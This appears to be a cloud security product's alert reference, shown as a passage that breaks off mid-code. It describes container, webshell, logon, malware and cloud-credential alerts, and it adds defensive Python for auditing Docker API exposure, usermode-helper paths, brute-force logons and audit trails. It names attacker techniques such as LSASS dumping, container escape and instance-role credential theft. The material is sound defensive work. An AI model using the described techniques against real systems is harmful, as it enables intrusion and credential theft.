The detection model found that your Docker remote debugging interface is open to 0.0.0.0. A Docker remote debugging interface exposed to the public network will be quickly compromised by worms. Exposing it only to the internal network also carries some risk, because it is often used by attackers for lateral movement after breaking into the internal network, exploiting this dangerous configuration to control more container resources.
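
The exposure described above can be checked on the host itself. The following is an added example (not Security Center's detection model) that rates each Docker API listener found in daemon.json or on the dockerd command line; the daemon.json text, the command line and the ratings are constructed assumptions for illustration.

```python
"""Audit where the Docker daemon's API listens.

Added example (not Security Center's detection model). It checks the two
places the listener addresses come from: the "hosts" key of daemon.json and
the -H/--host flags on the dockerd command line. All inputs are constructed.
"""
import json
import shlex
from urllib.parse import urlsplit

# Constructed sample: daemon.json that exposes the API on every interface, no TLS.
SAMPLE_DAEMON_JSON = (
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],'
    ' "log-driver": "json-file"}'
)

# Constructed sample: a dockerd command line as it would show in a process list.
SAMPLE_CMDLINE = (
    "/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2376"
    " --tlsverify --tlscacert=/etc/docker/ca.pem"
)

LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}


def hosts_from_daemon_json(text):
    """Return the listener URLs declared under the "hosts" key of daemon.json."""
    hosts = json.loads(text).get("hosts", [])
    return list(hosts) if isinstance(hosts, list) else [hosts]


def hosts_from_cmdline(cmdline):
    """Return listener URLs passed to dockerd as -H URL, --host URL or --host=URL."""
    args = shlex.split(cmdline)
    hosts = []
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        if arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
        i += 1
    return hosts


def classify_listener(url, tls_verify):
    """Rate one listener: 'ok' for local sockets, 'medium' for a TCP listener that
    requires client certificates, 'high' for a TCP listener reachable without them."""
    parts = urlsplit(url)
    if parts.scheme in ("unix", "fd", ""):
        return "ok"
    if parts.scheme != "tcp":
        return "unknown"
    host = parts.hostname or ""  # "" and "0.0.0.0"/"::" all mean every interface
    if host in LOOPBACK_HOSTS:
        return "ok"
    return "medium" if tls_verify else "high"


def audit(daemon_json_text, cmdline):
    """Map every configured listener to its rating. Client-certificate verification
    can be switched on in either place, so both are consulted."""
    cfg = json.loads(daemon_json_text)
    args = shlex.split(cmdline)
    tls_verify = bool(cfg.get("tlsverify", False)) or any(
        a in ("--tlsverify", "--tlsverify=true") for a in args)
    ratings = {}
    for url in hosts_from_daemon_json(daemon_json_text) + hosts_from_cmdline(cmdline):
        ratings[url] = classify_listener(url, tls_verify)
    return ratings


if __name__ == "__main__":
    for url, rating in audit(SAMPLE_DAEMON_JSON, "/usr/bin/dockerd").items():
        print(f"{rating:7} {url}")
```

A listener bound to one specific non-loopback address gets the same rating as 0.0.0.0, because from the configuration alone the tool cannot tell whether that address is routable from the Internet; the alert text above treats internal-only exposure as a lateral-movement risk in any case. The daemon refuses to start when "hosts" is set both in daemon.json and on the command line, so in practice only one of the two sources carries entries.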

Suspected privilege escalation

The detection model found a process on your server that appears to be exploiting system or application vulnerabilities to gain higher privileges. This may be a privilege escalation attempt by an attacker during an intrusion.

Anomalous container behavior

Security Center detected manual operations inside your container, such as installing software, executing scripts, or probing the container environment. This is common in lateral penetration and privilege escalation by attackers after compromising a container. There is also a chance that it is a normal business or O&M requirement. If you find this alert to be a false positive, you can select "Add to whitelist" or "Ignore" on the alert handling page.

Container initiating network scanning behavior

The detection model found that your container is proactively initiating suspicious network scanning behavior. This may be a method used by an attacker for deep penetration and lateral movement.

Credential information gathering inside a container

The detection model found access to sensitive files inside your container, such as Docker, Swarm, or Kubernetes configuration files, database connection configurations, logon credentials, API AccessKeys, certificates, and private key files. Promptly confirm whether there has been an intrusion event and a risk of data breach.

High-risk container operation

The detection model found that your server is performing a high-risk container operation. See the alert details for the specific reason. Investigate this behavior. If it is an O&M operation or a normal business function, you can ignore the alert or mark it as a false positive.

File time tampering

The detection model found a process on your server attempting to tamper with a file's timestamp. This may be an attacker trying to evade detection by mimicking normal system file times to forge the true creation, access, or modification times of an anomalous file.

Network proxy forwarding behavior

The detection model found an anomalous call to a risk tool on your server. Such tools are used by attackers for proxying, tunneling, and scanning during further intrusion of the server.

Masquerading as a Kubernetes system container

Security Center detected that a docker command was executed on your server to start a container masquerading as a Kubernetes internal service. This is common when attackers deploy a backdoor container and name it after a Kubernetes internal container to evade detection.

Sensitive manual operation inside a container

Security Center monitored manual operations inside your container, such as installing software, executing scripts, or probing the container environment. This is common when an attacker, after breaking into a container, needs to enrich the container's environment for lateral penetration. It is also seen during testing by O&M personnel. Please determine whether the behavior involved in this alert is an authorized operation. If it is an O&M operation, you can filter out this alert using a whitelist rule.

Suspicious probing command sequence in a container environment

Security Center detected a set of suspicious commands executed in a container environment. This is common when an attacker, after gaining access inside a container, probes the container's host environment, cluster information, and conditions for container escape to achieve privilege escalation and lateral movement. Because these actions are relatively minor, there is also a chance they are part of normal business or O&M requirements. Promptly investigate whether the source IP's access and operation on this resource are part of normal business or O&M requirements.

Worm command

Worm command.

Penetration tool exploitation behavior

Penetration tool exploitation behavior.

Calling a scanning tool

Calling a scanning tool.

Starting a suspicious image

Security Center found that your server started a container using a suspicious image. This is common in scenarios where an attacker exploits a service vulnerability to control container scheduling and implant malicious images for mining, backdoors, and more. Investigate promptly. If it is a normal business requirement, you can ignore it or mark it as a false positive. Security Center builds a malicious image intelligence library by real-time sensing of malicious image propagation on the cloud and analyzing public image repositories on the Internet. You can use the Image Scan feature to detect vulnerabilities, malicious files, and more in images.

Suspicious PowerShell instruction

Attackers often use PowerShell for malicious activities such as downloading malicious files, running malicious files persistently without dropping them to disk, and creating reverse shells.

Suspicious file implantation behavior

Suspicious file implantation behavior.

LSASS memory dump

The detection model found credential-dumping tools such as we and mimikatz running on your server. These tools extract system account hashes from LSASS memory, which can lead to the leakage of your account passwords.

Extracting operating system identity credentials

(No specific detection principle is available.)

Suspicious process behavior sequence

A process was detected starting multiple suspicious child processes. This process could be a vulnerable application service being attacked by an attacker, or the process itself could be malicious.

Executing a file dynamically loaded from memory

Executing a file dynamically loaded from memory.

Suspected process injection

This process injected code into another process, possibly attempting to run code in the context of the other process to bypass detection, escalate privileges, or access sensitive information in memory.

We recommend that you take the following measures:

1. Check the process and target process files. If they are not legitimate files, kill the process and quarantine the file. If it is a legitimate process, restart or kill the process without affecting normal business.

2. In conjunction with other alert information on this machine, comprehensively assess the potential impact of this intrusion event on the business and take other response measures.

3. Try to analyze the cause of this intrusion event and fix the security vulnerabilities.

Web application creates anomalous child process

(No specific detection principle is available.)

Suspected internal network lateral attack

Suspected internal network lateral attack.

Persistence backdoor creation behavior

Persistence backdoor creation behavior.

Persistence backdoor startup behavior

Persistence backdoor startup behavior.

Process command line obfuscation

The command line of a process on the host was detected to contain obfuscated encoding, which is very likely a malicious program or an attacker attempting to bypass security detection.

Cloud environment information collection

Cloud environment information collection.

Executing an anomalous scheduled task

A suspicious process was detected being created by the system's scheduled task component. This could be because a malicious program or an attacker, after gaining host access, added malicious code to a scheduled task to maintain persistence.

SSH backdoor

A backdoor process related to Secure Shell (SSH) was detected. After gaining access to a Linux host, a malicious program or attacker may modify related files or configurations to leave a logon backdoor through the SSH program.

Editor extension backdoor

A suspected backdoor program related to an editor extension component was found. A malicious program or attacker may use the extension functionality of a normal editor to hide a backdoor program.

Suspected escape by file tampering

Security Center detected the action of opening an important file in "write mode". This is common in scenarios of escaping from a container to the host by tampering with the file. You can focus on investigating whether the process, the operated file, and the file's opening properties originate from normal business operations. If it is an O&M operation or a normal business function, you can ignore the alert or mark it as a false positive.

Requesting an out-of-band (OOB) attack domain name

A process on the host was detected requesting a domain name that is often used for out-of-band data exfiltration. Attackers often specify in a payload that a target domain name should be requested upon successful exploitation. They then determine whether the attack was successful by observing whether the specific domain name was requested.

Anomalous pseudo-terminal shell creation behavior

(No specific detection principle is available.)

Accessing a suspicious mining pool domain name

A process on the host was detected requesting a suspicious mining pool domain name. This means the machine may be communicating with a mining pool. Further investigate for mining behavior based on the alert and recommended actions.

Container escape program startup

The Usermode Helper API is a mechanism in the Linux kernel for calling a user-specified user-space program, such as a program specified through files like /proc/sys/kernel/core_pattern. When this program is executed, it has host root privileges. This kernel mechanism should generally not be used in a container. Therefore, when a program inside a container is called by the host kernel, it usually represents an escape behavior.
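
A host-side audit of the helper paths the kernel will execute, as an added example (not Security Center code): it extracts the handler program from a core_pattern value, treats the modprobe path sysctl as a second usermode helper, and flags handlers that live under a container root filesystem or outside a trusted set. The trusted handler set, the container-root prefixes and the sample values are constructed assumptions.

```python
"""Audit Linux usermode-helper settings for handlers that live outside the host.

Added example, not Security Center code. The kernel runs the program named in
/proc/sys/kernel/core_pattern (when the value starts with '|') and the one named
in /proc/sys/kernel/modprobe with host root privileges, so a handler path under
a container's root filesystem is the condition the alert above describes.
"""
import os

# Assumed allowlist of handlers that normally appear on a host (distro-specific).
TRUSTED_HANDLERS = {
    "/usr/lib/systemd/systemd-coredump",
    "/lib/systemd/systemd-coredump",
    "/usr/share/apport/apport",
    "/sbin/modprobe",
    "/usr/sbin/modprobe",
}

# Directory prefixes under which container root filesystems live (assumption).
CONTAINER_ROOT_PREFIXES = ("/var/lib/docker/", "/var/lib/containerd/",
                           "/run/containerd/", "/var/lib/kubelet/pods/")


def handler_from_core_pattern(value):
    """Return the handler path from a core_pattern value, or None when core dumps go to a file."""
    value = value.strip()
    if not value.startswith("|"):
        return None
    fields = value[1:].split()
    return fields[0] if fields else ""


def classify_handler(path):
    """'file' (no helper), 'trusted', 'container-path', 'relative' or 'unknown'."""
    if path is None:
        return "file"
    if path in TRUSTED_HANDLERS:
        return "trusted"
    if path.startswith(CONTAINER_ROOT_PREFIXES):
        return "container-path"
    if not os.path.isabs(path):
        return "relative"
    return "unknown"


def audit_usermode_helpers(settings):
    """settings maps a sysctl name ('core_pattern', 'modprobe') to its raw value."""
    findings = {}
    if "core_pattern" in settings:
        findings["core_pattern"] = classify_handler(
            handler_from_core_pattern(settings["core_pattern"]))
    if "modprobe" in settings:
        findings["modprobe"] = classify_handler(settings["modprobe"].strip())
    return findings


def read_live_settings():
    """Read the live values from /proc on a Linux host; missing files are skipped."""
    out = {}
    for name in ("core_pattern", "modprobe"):
        try:
            with open(f"/proc/sys/kernel/{name}") as fh:
                out[name] = fh.read()
        except OSError:
            pass
    return out


# Constructed samples: a stock systemd host, and a handler under an overlay root.
SAMPLE_OK = {
    "core_pattern": "|/usr/lib/systemd/systemd-coredump %P %u %g %s %t %c %h\n",
    "modprobe": "/sbin/modprobe\n",
}
SAMPLE_SUSPECT = {
    "core_pattern": "|/var/lib/docker/overlay2/constructed-id/merged/tmp/handler\n",
    "modprobe": "/sbin/modprobe\n",
}

if __name__ == "__main__":
    print(audit_usermode_helpers(read_live_settings() or SAMPLE_OK))
```

Anything other than 'trusted' or 'file' deserves a look; 'unknown' on a host you manage usually means the allowlist needs a distro-specific entry, whereas 'container-path' is the escape condition itself.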

Windows token tampering for privilege escalation

Windows token tampering for privilege escalation.

Accessing a suspicious tunnel domain name

A process on the host was detected requesting a suspicious tunnel domain name. This means the machine may be conducting tunnel proxy communication. Further investigate based on the alert and recommended actions.

Anomalous modification of a system file

Anomalous modification of a system file.

Modifying a registry auto-start item

Modifying a registry auto-start item.

Scheduled task modification behavior

Scheduled task modification behavior.

Suspicious system policy modification behavior

Suspicious system policy modification behavior.

Web application modifies anomalous file

Web application modifies anomalous file.

Parent process spoofing

Parent process spoofing.

Container mounts high-risk host path

Container mounts high-risk host path.

Hijacking control flow using an environment variable

Hijacking control flow using an environment variable.

Webshell

Alert name

Description

Webshell file found

The detection model found a suspicious webshell file on your server. It may be a backdoor file implanted by an attacker to maintain access after successfully compromising a website.

Log or image file containing webshell code

The detection model found a file on your server with webshell code inserted. This may be an attacker attempting to exploit a file inclusion vulnerability.

Arbitrary file write backdoor found

Security Center found a file on your system disk that could lead to arbitrary file writing. This could have been implanted by an attacker after a successful network intrusion, or it could be an O&M file belonging to an administrator. We recommend that you first confirm the legitimacy of the file and handle it.

Information-stealing backdoor found

Security Center found a file on your system disk that could lead to information theft, such as a database operation log. This could have been implanted by an attacker after a successful network intrusion, or it could be an O&M file belonging to an administrator. We recommend that you first confirm the legitimacy of the file and handle it.

Trojan or hotlinking backdoor file found

The detection model found a suspicious Trojan file on your system disk. It may have been implanted by an attacker after successfully compromising a website. This file exhibits dangerous behaviors such as malicious redirection for traffic. We recommend that you first confirm the legitimacy of the file and handle it. If it was deployed by an administrator, you can choose to ignore it or mark it as a false positive in the console.

DLL-type web backdoor found

The detection model found a suspicious webshell file on your server. It may be a backdoor file implanted by an attacker to maintain access after successfully compromising a website.

Unusual Logon

Alert name

Description

Logon to an ECS instance from an unusual location

The logon location is outside the range of legitimate logon locations that you have defined. Please confirm the legitimacy of the logon.

Logon to an ECS instance from an unusual IP address

The logon IP address is outside the range of legitimate IP addresses that you have defined. Please confirm the legitimacy of the logon behavior.

Logon to an ECS instance with an unusual account

The logon account is outside the range of legitimate accounts that you have defined. Please confirm the legitimacy of the logon behavior.

Logon to an ECS instance at an unusual time

The logon time is outside the legitimate logon time range that you have defined. Please confirm the legitimacy of the logon behavior.

Successful brute-force attack on an ECS instance

Your ECS instance was successfully logged into after multiple failed password attempts. The system preliminarily determines that an attacker has guessed the password.

Successful brute-force attack on an ECS instance (SSH)

The detection model found that your server is under an SSH brute-force attack and that, after a number of attempts, the attacker guessed your SSH service password and successfully logged into the system.

Successful brute-force attack on an ECS instance (RDP)

The detection model found that your server is under an RDP brute-force attack and that, after a number of attempts, the attacker guessed your RDP service password and successfully logged into the system.
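
The four baseline alerts (unusual location, IP address, account, time) and the brute-force-success alerts above reduce to two checks over logon events. The following is an added example, not the Security Center model: the first function compares one event with a defined baseline, the second finds successes that follow a run of failures from the same address inside a time window. The baseline, the event layout and the events are constructed for illustration.

```python
"""Evaluate logon events against a defined baseline and flag successes that
follow a run of failures.

Added example, not the Security Center model. Baseline, event layout and
events are constructed.
"""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumed baseline, standing in for the legitimate ranges an administrator defines.
POLICY = {
    "locations": {"Hangzhou", "Shanghai"},
    "ip_ranges": [ip_network("10.0.0.0/8"), ip_network("203.0.113.0/24")],
    "accounts": {"root", "deploy"},
    "hours": (8, 20),  # allowed logon hours: 08:00 inclusive to 20:00 exclusive
}


def evaluate_logon(event, policy=POLICY):
    """Return the names of the baseline alerts the logon event triggers."""
    alerts = []
    if event["location"] not in policy["locations"]:
        alerts.append("Logon to an ECS instance from an unusual location")
    src = ip_address(event["src_ip"])
    if not any(src in net for net in policy["ip_ranges"]):
        alerts.append("Logon to an ECS instance from an unusual IP address")
    if event["account"] not in policy["accounts"]:
        alerts.append("Logon to an ECS instance with an unusual account")
    start, end = policy["hours"]
    if not start <= event["time"].hour < end:
        alerts.append("Logon to an ECS instance at an unusual time")
    return alerts


def brute_force_successes(events, min_failures=5, window=timedelta(minutes=10)):
    """Return (src_ip, account, time) for every successful logon preceded, within
    the window, by at least min_failures failed attempts from the same address."""
    recent_failures = {}
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        fails = recent_failures.setdefault(ev["src_ip"], [])
        fails[:] = [t for t in fails if ev["time"] - t <= window]  # expire old failures
        if ev["result"] == "failure":
            fails.append(ev["time"])
        elif len(fails) >= min_failures:
            hits.append((ev["src_ip"], ev["account"], ev["time"]))
            fails.clear()
    return hits


def _event(minute, src_ip, account, result, location="Hangzhou", hour=10):
    """Build one constructed logon event on 2026-01-19."""
    return {"time": datetime(2026, 1, 19, hour, minute), "src_ip": src_ip,
            "account": account, "result": result, "location": location}


# Constructed events: six failures then a success from one outside address,
# followed by one ordinary success from inside the baseline.
SAMPLE_EVENTS = (
    [_event(m, "198.51.100.7", "root", "failure", location="Unknown") for m in range(6)]
    + [_event(6, "198.51.100.7", "root", "success", location="Unknown")]
    + [_event(30, "10.1.2.3", "deploy", "success")]
)

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        if ev["result"] == "success":
            print(ev["src_ip"], ev["account"], evaluate_logon(ev))
    print(brute_force_successes(SAMPLE_EVENTS))
```

The failure counter is cleared after a hit so that one intrusion produces one alert rather than one per subsequent success; the window and threshold are the knobs that trade missed slow attacks against noise from users who mistype a password.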

Anomalous command sequence executed after ECS logon (SSH)

The detection model found that after an IP address logged into your server, a series of malicious commands were executed. This is very likely because a weak or leaked server password was used by an attacker to log in and execute commands.

Anomalous account logon

The model found that you added an anomalous account to the administrator user group and detected that this account has logon activity. If this was not your action, delete this account as soon as possible.

Logon from a malicious IP address

The detection model found that your server was successfully logged into from a malicious IP address. This IP address has a history of malicious attack behavior. If this was not your logon, change the ECS password as soon as possible.

Backdoor account logon

The detection model found that a backdoor account previously implanted by an attacker on your server has just been successfully logged into. If this was not your action, delete this account as soon as possible.

Suspected external logon scanning activity

The detection model found that your server is frequently initiating outbound brute-force scanning of protocols such as SSH, RDP, and SMB. This may be because your server has been compromised by an attacker and is being used as a springboard to attack other machines.

Successful brute-force attack on an ECS instance (multiple invalid users)

The detection model found that an IP address attempted to log in to your server with multiple invalid usernames and eventually succeeded. If this was not your logon, change the ECS password as soon as possible.

Logon from a malicious IP address (MySQL)

The detection model found that the MySQL application on your server was successfully logged into from a malicious IP address. This IP has a history of malicious attack behavior. If this was not your logon, change the MySQL password as soon as possible.

Logon from a malicious IP address (FTP)

The detection model found that the FTP application on your server was successfully logged into from a malicious IP address. This IP has a history of malicious attack behavior. If this was not your logon, change the FTP password as soon as possible.

Logon from a malicious IP address (SQL Server)

The detection model found that the SQL Server application on your server was successfully logged into from a malicious IP address. This IP has a history of malicious attack behavior. If this was not your logon, change the SQL Server password as soon as possible.

Malware

Alert name

Description

Trojan program

The detection model found a Trojan program on your server. A Trojan program is specifically designed to infiltrate a user's host. It typically disguises itself to be implanted into the system and then downloads and releases other malicious programs.

Suspicious C2 Trojan communication

Malicious C2 Trojan program.

DDoS Trojan

The detection model found a DDoS Trojan running on your server. A DDoS Trojan is a malicious program that runs on a compromised host and receives instructions to launch DDoS attacks against a target specified by an attacker.

Ransomware

The detection model found ransomware running on your server. Ransomware is a malicious program that encrypts all critical data files on a host to demand a ransom.

Backdoor program

The detection model found a backdoor program running on your server. A backdoor program is a persistent program implanted in the system that allows an attacker to maintain continuous access to the host.

Infectious virus

The detection model found an infectious virus running on your server. An infectious virus is an advanced malicious program whose body injects malicious code into normal program files so that it runs when they do. As a result, many normal programs become infected and are themselves detected as malicious.

Worm

The detection model found a worm running on your server. A worm is a program used for lateral movement attacks from a compromised host to other hosts. It often involves activities such as vulnerability exploits and password cracking.

Malicious program

The detection model found a malicious program running on your server. A malicious program is a program that has a variety of malicious behavior characteristics, or a third-party program that causes disruption or damage.

Mining program

The detection model found a mining program running on your server. A mining program is a program that seizes host computing resources to mine virtual currency. This often results in high CPU usage and the presence of other related malicious programs on the host.

Suspicious program

The detection model found a suspicious program running on your server. A suspicious program typically has some malicious code characteristics or highly suspicious behaviors and is not yet clearly classified. You need to evaluate it based on the provided information.

High-risk program

Cloud scan (high-risk program).

Self-mutating Trojan

The detection model found a self-mutating Trojan running on your server. A self-mutating Trojan is a Trojan program with self-mutation capabilities. It changes its own hash or copies itself to many different paths and runs in the background to evade cleanup.

Tainted basic software

The detection model found tainted basic software on your server. Tainted basic software is a special type of malicious program, usually a normal system program into which malicious code has been injected. Although it retains the functionality of the original basic software, it has hidden malicious behaviors.

Exploit program

The detection model found an exploit program running on your server. An exploit program is used to attack or attempt to attack known vulnerabilities in the operating system or applications to achieve privilege escalation, escape, arbitrary code execution, and other objectives.

Hacking tool

The detection model found a hacking tool on your server. Hacking tools are used by attackers during an intrusion for privilege escalation, stealing sensitive data, uninstalling security software, or as a backdoor program implanted in the system after an intrusion.

Rootkit

The detection model found a rootkit on your server. A rootkit is a malicious module implanted at the system's core to hide its own or other malicious programs' traces.

Rootkit kernel module

The detection model found a rootkit on your server. A rootkit is a malicious module implanted at the system's core to hide its own or other malicious programs' traces.

Highly suspicious program

The detection model found a suspicious program running on your server. A suspicious program typically has some malicious code characteristics or highly suspicious behaviors and is not yet clearly classified. You need to evaluate it based on the provided information.

Riskware

The detection model found riskware on your cloud host. Riskware is not necessarily a truly malicious program; it may be an ordinary software tool. However, it has some functions that could pose a threat to the host. If used by someone with malicious intent in a cyberattack, it could cause harm. Common riskware includes process management tools, system service management tools, and remote management tools. The specific situation needs to be judged by the user based on the information.

Downloader Trojan

The detection model found a downloader Trojan on your server. A downloader Trojan typically downloads and releases third-party programs such as malicious Trojans and adware.

Proxy tool

The detection model found a proxy tool on the host. Proxy tools are used by attackers for proxying and tunneling, often in scenarios of further server intrusion.

Engine test program

The detection model found an engine test program on the host. This program is often used to check if the virus detection engine is working properly.

Information-stealing tool

The detection model found an information-stealing tool on the host. Information-stealing tools are often used to steal various sensitive files and information from the host.

Scanner

The detection model found a scanner on the host. Scanners are often used by attackers to discover live hosts, open ports, and hosts with security risks such as vulnerabilities and weak passwords, often for further intrusion scenarios.

Ransomware

The detection model found a file with ransomware characteristics on your system disk. We recommend that you first confirm the legitimacy of the file and then handle it. Because ransomware encrypts files on the host once it runs, confirm that backups exist before touching the file, and isolate the host if the file is not legitimate.

Adware

The detection model found adware on your server. Adware is typically implanted in normal software, disrupting normal server use and consuming extra resources.

Obfuscated program

The detection model found an obfuscated program on your server. Advanced malware often obfuscates itself to evade detection.

Cracking program

The detection model found a cracking program on your server. The source of such cracking programs is unknown and may pose potential security risks.

Private server tool

The detection model found a private server tool on your server. Private server tools are generally used in game or cheat scenarios and may contain malicious code.

Reverse shell backdoor

The cloud scan found a reverse shell backdoor program on your server. Such a program connects back to an attacker-controlled server and attaches a command shell to that connection.

Malicious document

The detection model identified a malicious document file. Malicious documents are used by attackers for phishing attacks, luring users to click and execute a malicious payload to gain control.

Cloud Service Threat Detection

Alert name

Description

Unusual logon of a RAM user

This alert means that a RAM user under your account has logged in from an unusual location. This type of alert may occur when you change your logon location. If the logon request is not for your normal business needs, it means an attacker may have obtained the account's username and password.

Malicious IP address using an AccessKey

The system detected that a malicious IP address is using your AccessKey. If you confirm that this is not your own operation, disable and replace the AccessKey as soon as possible.

Suspicious access to OSS

This alert means that a user used an OSS tool to access your bucket abnormally. This could be because the calling IP address changed or the API call failed. Please confirm whether the source IP of the request and the tool's operation are part of normal business needs. Otherwise, an attacker may have gained control of your OSS bucket.

Anomalous command from Cloud Assistant

The detection model found that your cloud account called a command on your server through the Cloud Assistant OpenAPI, and the command's content is malicious. It is highly likely that an attacker has obtained your AccessKey to perform malicious operations.

Anomalous AccessKey call

The system detected an anomalous call behavior with your AccessKey.

ECS instance role credential called externally

The model detected that the Security Token Service (STS) temporary credentials for a role that you granted to an ECS instance are being called from an external IP address. This may indicate that the associated ECS instance has been compromised. An attacker may have stolen the STS temporary credentials for the role associated with the instance and is using them to make external calls. Alibaba Cloud does not recommend using these credentials on hosts other than the one that requested them. For more information about ECS instance roles, see Instance RAM roles.

Cloud Assistant registration hijacking

The system detected that another Alibaba Cloud account is installing Cloud Assistant on your ECS instance to achieve remote command control. Please confirm as soon as possible whether this is an operation by relevant O&M personnel and check the server for other anomalies.

Hacking tool using an AK

Your AccessKey (AK) was detected being used by a hacking tool. Please confirm as soon as possible whether this is normal user behavior.

ECS role credential called by another Alibaba Cloud account

The model detected that the Security Token Service (STS) temporary credentials for the role assigned to your ECS instance are being invoked by another Alibaba Cloud account. This may indicate that the ECS instance has been attacked. An attacker may have stolen the STS temporary credentials of the role associated with the instance and is using them from an account they control. Alibaba Cloud does not recommend that you use these credentials on hosts other than the one that requested them. For more information about ECS instance roles, see Instance RAM roles.

Anomalous call to a sensitive API by an ECS role credential

The model detected that your ECS instance role performed a sensitive API operation. Please confirm the identity of the caller's IP address as soon as possible and verify whether the activity is part of normal business behavior. If the IP belongs to an ECS under your own assets, you also need to check for the risk of compromise. In an intrusion, an attacker may steal the ECS instance's role credential by compromising a server or website and use this identity to make such sensitive API calls for further attacks.

Suspicious identity calling a sensitive API

The model detected that your account made a relatively sensitive API call, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of ECS resources

The model detected that you are traversing resource instances across various regions, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of RDS resources

The model detected that you are traversing resource instances across various regions, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of OSS access permissions

The model detected that you are traversing the access control lists (ACLs) of multiple OSS buckets, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous creation of a high-privilege sub-account

This account created a RAM user with admin privileges and enabled web console logon. Attackers often use this method to implant a backdoor for subsequent intrusion operations. Quickly investigate whether the creation of this sub-account was a legitimate operation by relevant personnel.

Anomalous traversal of multiple sub-account permissions

The model detected that you are traversing the permission policies of multiple sub-accounts, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of a single sub-account's permissions

The model detected that you are traversing the permission policies of a sub-account and its user groups, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous traversal of role permissions

The model detected that you are traversing the permission policies of multiple roles in the account, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous opening of public network access to a database

The model detected that you changed a database to be accessible from the public network and added an IP whitelist, and the calling IP is not from a common geographical location. You need to verify the caller's identity and whether the related operation is reasonable to avoid the risk of AccessKey (AK) leakage.

Anomalous creation of a high-privilege role

To use a role, it is usually sufficient to grant it permissions for a specific service. It is not recommended to directly grant administrator privileges to a role. Please verify and confirm as soon as possible whether the creation of this role is a normal business requirement.

Anomalous permission probing behavior

The model detected that you are traversing the API call permissions of multiple cloud products, which resembles the automated calling behavior of a hacking tool. You need to verify the caller's identity and whether the related operation is reasonable as soon as possible to avoid the risk of AccessKey (AK) leakage.

RAM user logs into the console and performs sensitive operations

A RAM user was detected enabling web console logon and performing relatively sensitive operations in the console.

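Every alert in the table above is a pattern in the account's API audit trail. The following Python is an added illustration of three of those patterns, not Security Center's own detection logic: resource traversal by one AccessKey across many regions, an ECS instance-role STS credential used from an address that is not the instance's, and the CreateUser / CreateLoginProfile / AttachPolicyToUser(AdministratorAccess) sequence behind the "high-privilege sub-account" alert. The event field names (eventTime, eventName, acsRegion, sourceIpAddress, userIdentity, requestParameters) follow the general shape of ActionTrail records but are an assumption for this example, as are the "<role>/<instance-id>" principalId layout, the instance-to-address map, and all sample events, which are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def parse_time(ts):
    """ActionTrail-style UTC timestamp ("2025-01-01T10:00:00Z") -> aware datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def ev(time, name, region, ip, identity, params=None):
    """One constructed audit event; the field names are an assumption (see lead-in)."""
    return {"eventTime": time, "eventName": name, "acsRegion": region,
            "sourceIpAddress": ip, "userIdentity": identity,
            "requestParameters": params or {}}


def cross_region_enumeration(events, min_regions=3, window=timedelta(minutes=10)):
    """Flag an AccessKey whose Describe*/List* calls reach at least min_regions
    distinct regions inside one sliding window (the resource-traversal pattern)."""
    per_key = defaultdict(list)
    for e in events:
        if e["eventName"].startswith(("Describe", "List")):
            per_key[e["userIdentity"]["accessKeyId"]].append(
                (parse_time(e["eventTime"]), e["acsRegion"]))
    findings = {}
    for key, calls in per_key.items():
        calls.sort()
        for i, (t_end, _) in enumerate(calls):
            regions = {r for t, r in calls[:i + 1] if t_end - t <= window}
            if len(regions) >= min_regions:
                findings[key] = sorted(regions)
    return findings


def instance_role_from_foreign_ip(events, instance_addresses):
    """Flag an ECS instance-role STS session used from an address that is not
    one of the instance's own addresses (credentials lifted from the metadata
    service and replayed elsewhere). Assumes principalId ends with "/<instance-id>"."""
    findings = []
    for e in events:
        ident = e["userIdentity"]
        instance_id = ident.get("principalId", "").rsplit("/", 1)[-1]
        if ident.get("type") != "assumed-role" or not instance_id.startswith("i-"):
            continue
        if e["sourceIpAddress"] not in instance_addresses.get(instance_id, set()):
            findings.append((instance_id, e["sourceIpAddress"]))
    return findings


def backdoor_admin_users(events, window=timedelta(minutes=30)):
    """Flag a RAM user that was created, given console logon, and granted
    AdministratorAccess within one window: the backdoor-account sequence."""
    steps = defaultdict(dict)  # user name -> {step: time}
    for e in events:
        params = e["requestParameters"]
        user = params.get("UserName")
        if not user:
            continue
        if e["eventName"] in ("CreateUser", "CreateLoginProfile"):
            steps[user][e["eventName"]] = parse_time(e["eventTime"])
        elif (e["eventName"] == "AttachPolicyToUser"
              and params.get("PolicyName") == "AdministratorAccess"):
            steps[user]["AdminPolicy"] = parse_time(e["eventTime"])
    flagged = []
    for user, seen in steps.items():
        if {"CreateUser", "CreateLoginProfile", "AdminPolicy"} <= set(seen):
            if max(seen.values()) - min(seen.values()) <= window:
                flagged.append(user)
    return sorted(flagged)


# Constructed sample data: identities, the instance's real address, and events.
RAM_USER = {"type": "ram-user", "accessKeyId": "LTAI_EXAMPLE_A"}
ADMIN_KEY = {"type": "ram-user", "accessKeyId": "LTAI_EXAMPLE_B"}
INSTANCE_ROLE = {"type": "assumed-role", "accessKeyId": "STS.EXAMPLE",
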